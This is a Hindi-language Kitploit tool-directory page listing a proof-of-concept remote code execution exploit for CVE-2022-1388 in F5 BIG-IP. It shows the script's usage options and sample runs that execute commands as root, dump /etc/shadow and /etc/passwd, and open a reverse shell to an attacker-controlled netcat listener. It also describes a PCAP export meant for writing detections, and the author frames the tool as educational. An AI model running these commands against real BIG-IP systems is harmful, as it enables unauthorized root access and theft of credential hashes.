Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-1388 — -- केवल शैक्षिक उपयोग के लिए -- CVE-2022-1388 के लिए प्रूफ-ऑफ-कॉन्सेप्ट RCE, साथ ही नीली और लाल टीमों के लिए कुछ अतिरिक्त कार्यक्षमता | Kitploit
उपकरण/GitHubGitHub/vaelwolf/cve-2022-1388
पैकेट स्निफिंग और विश्लेषणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफोरेंसिकपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubvaelwolf/cve-2022-1388

CVE-2022-1388

-- केवल शैक्षिक उपयोग के लिए -- CVE-2022-1388 के लिए प्रूफ-ऑफ-कॉन्सेप्ट RCE, साथ ही नीली और लाल टीमों के लिए कुछ अतिरिक्त कार्यक्षमता

रिपॉजिटरी देखें
7143 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-1388 RCE, रिवर्स शेल, और ऑटो-एक्सपोर्ट PCAP

-- केवल शैक्षिक उपयोग के लिए --

लेखक इस प्रोजेक्ट/रिपॉजिटरी के किसी भी पहलू से किए गए किसी भी कार्य के लिए जिम्मेदार या उत्तरदायी नहीं है। मैंने इसे हमले को समझने और SIEM के भीतर डिटेक्शन लिखने के उद्देश्य से बनाया है और दूसरों को भी ऐसा करने के लिए साझा करना चाहता था। अपने जोखिम पर उपयोग करें।

यह एक्सप्लॉइट F5 सिस्टम्स में BIG-IP iControl REST भेद्यता CVE-2022-1388 को लक्षित करता है। कृपया प्रभावित संस्करणों और अन्य जानकारी के लिए F5 सलाहकार (https://support.f5.com/csp/article/K23605346) देखें।

बेझिझक PR करें या कोई समस्या रिपोर्ट करें। इसका परीक्षण CentOS मशीन से Python 3.6 के साथ Google Cloud में कुछ कमजोर F5 VE पर किया गया था।

Usage

root@kitploit:~
CVE-2022-1388.py [-h] -t TARGET -p PORT [-c CMD] [-s] [-e] [-lh LHOST] [-lp LPORT]

optional arguments:
  -h, --help            show this help message and exit
  
  -t TARGET, --target TARGET, --RHOSTS TARGET
                        Target IP of vulnerable BIG-IP system
  -p PORT, --port PORT, --RPORT PORT
                        Target port on vulnerable BIG-IP system
  -c CMD, --cmd CMD, --command CMD
                        Command to run on target system
  -e, --export, --tcpdump
                        Export captured traffic and ssl-key.log | **Requires sudo privileges!
  -q, --quiet           Don't display banner
  -s, --shell           Launch an interactive shell
  -lh LHOST, --lhost LHOST, --LHOST LHOST
                        Required for -s [shell]; Local IP/interface to bind listener to
  -lp LPORT, --lport LPORT, --LPORT LPORT
                        Required for -s [shell]; Local port to bind listener to

रिमोट कोड एक्जीक्यूशन

root@kitploit:~
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c id

===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
       Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
=============================================================================================================== 


uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
root@kitploit:~
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/shadow" -q
root:!!:18656:0:99999:7:::
bin:*:16479:0:99999:7:::
daemon:*:16479:0:99999:7:::
adm:*:16479:0:99999:7:::
lp:*:16479:0:99999:7:::
mail:*:16479:0:99999:7:::
uucp:*:16479:0:99999:7:::
[[ removed for brevity ]]

रिवर्स शेल

root@kitploit:~
Attacker:
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -s -lh 10.142.0.8 -lp 4444

===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
        Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
=============================================================================================================== 


[+] If you haven't already, please start your listener of choice on port 4444
[+] Press any key to continue...

[+] Exploit finished. If you launched a reverse shell listener, check there for your terminal!
 
Listener:
$ nc -lp 4444
bash: no job control in this shell
[@localhost:Active:Standalone] restjavad # whoami
whoami
root

विश्लेषण के लिए PCAP निर्यात करना

-e (--export) फ्लैग निर्दिष्ट करने से दो फ़ाइलें बनेंगी: detection.pcap और ssl-key.log। हर बार -e फ्लैग निर्दिष्ट करने पर ये फ़ाइलें ओवरराइट हो जाएंगी, इसलिए उन फ़ाइलों को स्थानांतरित या नाम बदलना याद रखें जिन्हें आप रखना चाहते हैं। ssl-key.log को Wireshark में Preferences -> Protocols -> TLS -> (Pre)-Master-Secret log filename के माध्यम से आयात किया जा सकता है ताकि TLS सत्र को डिक्रिप्ट किया जा सके। ध्यान दें कि tcpdump के कारण, -e का उपयोग करते समय, स्क्रिप्ट को sudo के रूप में चलाया जाना चाहिए।

root@kitploit:~
$ sudo python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/passwd" -q -e
[+] Starting tcpdump on port 8443 for 5 seconds

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
[[ removed for brevity ]]

TLS डिक्रिप्शन से पहले:

Wireshark 01

स्वचालित रूप से निर्यात किए गए ssl-key.log को Wireshark में TLS प्राथमिकताओं में जोड़ना:

Wireshark Preferences

TLS डिक्रिप्शन के बाद:

Wireshark 02
Wireshark 03
टूल डाउनलोड करें